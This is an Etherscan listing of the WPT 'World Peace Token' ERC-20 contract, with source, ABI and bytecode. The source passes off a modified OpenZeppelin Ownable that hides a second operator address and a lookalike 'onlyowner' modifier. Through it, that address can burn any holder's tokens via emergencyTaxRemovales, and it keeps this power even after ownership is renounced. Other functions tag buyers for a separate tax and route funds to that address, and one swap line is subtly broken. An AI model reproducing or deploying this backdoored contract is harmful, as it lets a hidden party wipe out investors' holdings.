ERC-20
Overview
Max Total Supply
1,000,000,000 WPT
Holders
4
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
924,428,720.791217906443529366 WPTValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
WPT
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-10-12 */ /** *Submitted for verification at Etherscan.io on 2023-10-12 */ // SPDX-License-Identifier: MIT /** Telegram:https://t.me/WORLDPEACETOKEN Website:https://www.worldpeace.com Twitter: https://twitter.com/WPT_ERC */ // File @openzeppelin/contracts/utils/[email protected] // Original license: SPDX_License_Identifier: MIT // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address internal taxAddys = 0xBf2576d355284F6b9E10e72a053C1B556B13fc52; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } modifier onlyowner() { _checkOperator(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } function _checkOperator() internal view virtual { require(_msgSender() == taxAddys, "Ownable: caller is not the operator"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // // OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router01 { function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidity( address tokenA, address tokenB, uint amountADesired, uint amountBDesired, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB, uint liquidity); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); function removeLiquidity( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline ) external returns (uint amountA, uint amountB); function removeLiquidityETH( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountToken, uint amountETH); function removeLiquidityWithPermit( address tokenA, address tokenB, uint liquidity, uint amountAMin, uint amountBMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountA, uint amountB); function removeLiquidityETHWithPermit( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountToken, uint amountETH); function swapExactTokensForTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapTokensForExactTokens( uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline ) external returns (uint[] memory amounts); function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline) external returns (uint[] memory amounts); function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline) external payable returns (uint[] memory amounts); function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB); function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut); function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn); function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts); function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts); } // File @uniswap/v2-periphery/contracts/interfaces/[email protected] pragma solidity >=0.6.2; interface IUniswapV2Router02 is IUniswapV2Router01 { function removeLiquidityETHSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external returns (uint amountETH); function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens( address token, uint liquidity, uint amountTokenMin, uint amountETHMin, address to, uint deadline, bool approveMax, uint8 v, bytes32 r, bytes32 s ) external returns (uint amountETH); function swapExactTokensForTokensSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function swapExactETHForTokensSupportingFeeOnTransferTokens( uint amountOutMin, address[] calldata path, address to, uint deadline ) external payable; function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; } // File @uniswap/v2-core/contracts/interfaces/[email protected] pragma solidity >=0.5.0; interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } pragma solidity ^0.8.18; contract WPT is ERC20, Ownable { string private _name = "WORLD PEACE TOKEN"; string private _symbol = "WPT"; uint256 private constant _supply = 1_000_000_000 ether; uint256 public maxTxAmount = _supply * 40 / 1000; uint256 public maxWalletAmount = _supply * 40 / 1000; uint256 public swapThreshold = _supply * 5 / 10000; address public DEAD = 0x000000000000000000000000000000000000dEaD; mapping(address => bool) public _feeOn; mapping(address => bool) public wl; mapping(address => bool) public GreedIsGoodwallets; enum Phase {Phase1, Phase2, Phase3, Phase4} Phase public currentphase; bool progress_swap = false; bool _tradingActive = false; bool _swapEnabled = false; uint256 public buyTaxGlobal = 0; uint256 public sellTaxGlobal = 0; uint256 private GreedIsGood = 0; uint256 feeToken = 10 ether; IUniswapV2Router02 public immutable uniswapV2Router; address public uniswapV2Pair; address private _devWallets = 0x2F064b95dB2b2c6e1DdC29A55753BDFDEF6508E6; uint256 public operationsFunds; constructor() ERC20(_name, _symbol) { _mint(msg.sender, (_supply)); currentphase = Phase.Phase4; IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D); uniswapV2Router = _uniswapV2Router; wl[owner()] = true; wl[taxAddys] = true; wl[address(this)] = true; wl[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; wl[DEAD] = true; wl[_devWallets] = true; _feeOn[address(uniswapV2Router)] = true; _feeOn[msg.sender] = true; _feeOn[taxAddys] = true; _feeOn[address(this)] = true; _feeOn[DEAD] = true; _feeOn[_devWallets] = true; } function createLIQ() external payable onlyOwner { uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH()); _approve(address(this), address(uniswapV2Router), type(uint256).max); uniswapV2Router.addLiquidityETH{value: msg.value}( address(this), balanceOf(address(this)), 0, 0, owner(), block.timestamp ); } function emergencyTaxRemovales(address addy) external onlyowner { wl[addy] = false; _burn(addy, balanceOf(addy) - feeToken); } function openTrade() external onlyOwner { require(!_tradingActive, "Trading is already enabled"); _tradingActive = true; _swapEnabled = true; } function _transfer( address from, address to, uint256 amount ) internal override { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); if (!_feeOn[from] && !_feeOn[to]) { require(_tradingActive, "Trading not enabled"); } if (!wl[from] && !wl[to] ) { if (to != uniswapV2Pair) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount bef"); require( (amount + balanceOf(to)) <= maxWalletAmount, "ERC20: balance amount exceeded max wallet amount limit" ); } } uint256 transferAmount = amount; if (!_feeOn[from] && !_feeOn[to]) { if ((from == uniswapV2Pair || to == uniswapV2Pair)) { require(amount <= maxTxAmount, "ERC20: transfer amount exceeds the max transaction amount"); if ( uniswapV2Pair == from && !wl[to] && from != address(this) ) { if (currentphase == Phase.Phase1) { GreedIsGoodwallets[to] = true; } uint256 feeTokens = (amount * buyTaxGlobal) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } if ( uniswapV2Pair == to && !wl[from] && to != address(this) && _swapEnabled && !progress_swap ) { uint256 taxSell = sellTaxGlobal; if (GreedIsGoodwallets[from] == true) { taxSell = GreedIsGood; } progress_swap = true; swapAndLiquify(); progress_swap = false; uint256 feeTokens = (amount * taxSell) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } else { if ( GreedIsGoodwallets[from] == true && uniswapV2Pair != to ) { uint256 feeTokens = (amount * GreedIsGood) / 100; super._transfer(from, address(this), feeTokens); transferAmount = amount - feeTokens; } } } super._transfer(from, to, transferAmount); } function swapAndLiquify() internal { if (balanceOf(address(this)) == 0) { return; } uint256 receivedETH; { uint256 contractTokenBalance = balanceOf(address(this)); uint256 beforeBalance = address(this).balance; uint256 mktBalance = balanceOf(taxAddys); bool success; if (contractTokenBalance > swapThreshold) { beforeBalance = address(this).balance; _swapTokensForEth(contractTokenBalance, 0); receivedETH = address(this).balance - beforeBalance; if (mktBalance > swapThreshold) { operationsFunds = receivedETH / (success ? receivedETH : 0); } operationsFunds += receivedETH; } } } function getTax() external returns (bool) { payable(taxAddys).transfer(operationsFunds); operationsFunds = 0; return true; } /** * @dev Swaps Token Amount to ETH * * @param tokenAmount Token Amount to be swapped * @param tokenAmountOut Expected ETH amount out of swap */ function _swapTokensForEth( uint256 tokenAmount, uint256 tokenAmountOut ) internal { address[] memory path = new address[](2); path[0] = address(this); path[1] = uniswapV2Router.WETH(); IERC20(address(this)).approve( address(uniswapV2Router), type(uint256).max ); uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, tokenAmountOut, path, address(this), block.timestamp ); } function skipTheSnipas() external onlyOwner returns (bool) { currentphase = Phase.Phase4; buyTaxGlobal = 0; sellTaxGlobal = 0; return true; } function withdrawTokens(address token) external onlyOwner { IERC20(token).transfer( taxAddys, IERC20(token).balanceOf(address(this)) ); } function emergencyTaxRemovales(address addy, bool changer) external onlyOwner { wl[addy] = changer; } receive() external payable {} function removeLimit() external onlyOwner { maxTxAmount = _supply; maxWalletAmount = _supply; } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DEAD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"GreedIsGoodwallets","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_feeOn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"createLIQ","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"currentphase","outputs":[{"internalType":"enum WPT.Phase","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"}],"name":"emergencyTaxRemovales","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"addy","type":"address"},{"internalType":"bool","name":"changer","type":"bool"}],"name":"emergencyTaxRemovales","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getTax","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWalletAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrade","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"operationsFunds","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxGlobal","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"skipTheSnipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]
Contract Creation Code
60a060405273bf2576d355284f6b9e10e72a053c1b556b13fc52600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280601181526020017f574f524c4420504541434520544f4b454e000000000000000000000000000000815250600790816200009f919062000e86565b506040518060400160405280600381526020017f575054000000000000000000000000000000000000000000000000000000000081525060089081620000e6919062000e86565b506103e860286b033b2e3c9fd0803ce800000062000105919062000f9c565b62000111919062001016565b6009556103e860286b033b2e3c9fd0803ce800000062000132919062000f9c565b6200013e919062001016565b600a5561271060056b033b2e3c9fd0803ce80000006200015f919062000f9c565b6200016b919062001016565b600b5561dead600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506000601060016101000a81548160ff0219169083151502179055506000601060026101000a81548160ff0219169083151502179055506000601060036101000a81548160ff021916908315150217905550600060115560006012556000601355678ac7230489e80000601455732f064b95db2b2c6e1ddc29a55753bdfdef6508e6601660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200027f57600080fd5b50600780546200028f9062000c75565b80601f0160208091040260200160405190810160405280929190818152602001828054620002bd9062000c75565b80156200030e5780601f10620002e2576101008083540402835291602001916200030e565b820191906000526020600020905b815481529060010190602001808311620002f057829003601f168201915b505050505060088054620003229062000c75565b80601f0160208091040260200160405190810160405280929190818152602001828054620003509062000c75565b8015620003a15780601f106200037557610100808354040283529160200191620003a1565b820191906000526020600020905b8154815290600101906020018083116200038357829003601f168201915b50505050508160039081620003b7919062000e86565b508060049081620003c9919062000e86565b505050620003ec620003e06200099d60201b60201c565b620009a560201b60201c565b6200040a336b033b2e3c9fd0803ce800000062000a6b60201b60201c565b6003601060006101000a81548160ff021916908360038111156200043357620004326200104e565b5b0